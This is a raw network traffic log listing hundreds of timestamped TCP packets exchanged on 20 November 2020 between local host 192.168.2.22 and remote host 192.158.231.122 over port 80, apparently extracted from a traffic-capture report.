          Nov 20, 2020 19:32:05.912290096 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912317991 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912326097 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.912345886 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.912367105 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.912389994 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.914165974 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.914462090 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914490938 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914524078 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914555073 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914582968 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914592028 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.914611101 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914638996 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914665937 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914694071 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914704084 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.914722919 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914757967 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914777040 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.914788961 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914817095 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914844036 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914855957 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.914872885 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914899111 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914927006 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914937019 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.914957047 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.914989948 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915002108 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.915021896 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915049076 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915064096 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.915076971 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915103912 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915131092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915143013 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.915158033 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915185928 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915219069 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915221930 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.915250063 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915266991 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.915277004 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915304899 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915332079 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915342093 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.915359020 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:05.915443897 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:05.915721893 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.036362886 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036393881 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036406994 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036420107 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036437988 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036453962 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036469936 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036485910 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036525011 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.036559105 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.038165092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038183928 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038201094 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038216114 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038232088 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038247108 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038255930 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.038264990 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038278103 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.038280964 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038297892 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.038316011 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.039176941 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040083885 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040102959 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040117979 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040133953 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040143013 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040149927 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040163040 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040167093 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040188074 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040190935 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040205956 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040209055 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040222883 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040225983 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040241003 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040244102 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040257931 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040262938 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040273905 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040281057 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040291071 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040301085 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040306091 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040308952 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040326118 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040328026 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040344000 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040347099 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040360928 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040368080 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040378094 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040385962 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040395021 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040406942 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040410995 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040426016 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040427923 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040445089 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040446043 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040462971 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040466070 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040477991 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040483952 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040498018 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040502071 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040517092 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040518045 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040534973 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040535927 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040553093 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040553093 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040570021 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040570974 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040586948 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040595055 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040604115 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040618896 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040621996 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040637016 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040648937 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040668011 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.042340040 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.160748005 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160777092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160793066 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160809040 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160828114 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160845041 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160861015 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160877943 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160952091 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162070036 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162089109 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162105083 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162112951 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162121058 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162134886 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162141085 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162152052 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162161112 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162168026 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162193060 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162472963 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.163080931 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.163098097 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.163170099 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.163486004 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164323092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164345026 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164376020 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164397955 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164597034 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164614916 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164630890 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164637089 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164649010 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164649963 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164664984 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164679050 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164720058 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164736986 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164753914 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164757013 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164769888 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164772034 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164784908 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164798975 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164875031 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166266918 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166285992 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166301012 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166316986 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166332960 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166347980 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166363001 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166367054 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166378975 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166384935 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166393042 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166399002 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166409016 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166416883 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166424990 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166434050 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166449070 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166450024 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166462898 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166466951 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166476965 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166482925 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166490078 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166500092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166515112 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166515112 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166528940 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166536093 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166543961 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166554928 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166568995 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166570902 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166587114 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166589022 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166601896 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166605949 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166618109 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166623116 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166632891 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166657925 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285123110 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285155058 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285172939 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285190105 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285202980 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285207033 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285227060 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285228968 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285232067 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285242081 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285247087 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285264969 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285267115 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285279989 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285293102 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286195993 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286221981 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286232948 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286241055 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286252975 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286258936 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286267042 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286276102 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286290884 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286293030 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286304951 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286309958 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286319017 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286339998 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286344051 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286365032 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286374092 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286384106 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286395073 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286401033 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286417007 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286418915 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286429882 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286442995 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286561966 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286580086 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286597013 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286607027 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286621094 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286660910 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286662102 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286683083 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286693096 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286700964 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286716938 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286734104 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286744118 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286748886 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286760092 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.287405968 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.287424088 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.287441015 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.287457943 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.287468910 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.287487030 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.287491083 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288373947 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288393974 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288410902 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288427114 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288438082 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288444042 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288451910 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288463116 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288466930 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288475990 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288486958 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288499117 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288503885 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288513899 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288522005 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288535118 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288539886 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288548946 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288558960 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288572073 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288585901 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288661003 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288678885 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288695097 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288702965 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288712978 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288718939 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288727045 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288739920 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288757086 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288768053 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288774967 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288793087 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288803101 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288822889 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288831949 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288846970 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288858891 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290709019 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290728092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290745020 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290757895 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290765047 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290785074 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290801048 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290817976 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290834904 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290843964 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290853024 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290854931 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290870905 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290874004 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290884972 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290899038 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290905952 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290925026 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290941000 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290946960 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290960073 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290960073 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290973902 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290977955 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290988922 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291014910 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291050911 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291078091 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291089058 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291096926 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291111946 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291116953 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291131973 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291135073 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291148901 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291152954 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291165113 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291171074 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291186094 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291188002 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291207075 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291210890 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291223049 CET4916780192.168.2.22192.158.231.122
